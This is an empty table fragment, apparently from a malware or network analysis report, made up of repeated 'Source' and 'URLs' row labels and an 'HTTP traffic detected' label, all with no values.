Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: |
Source: | HTTP traffic detected: |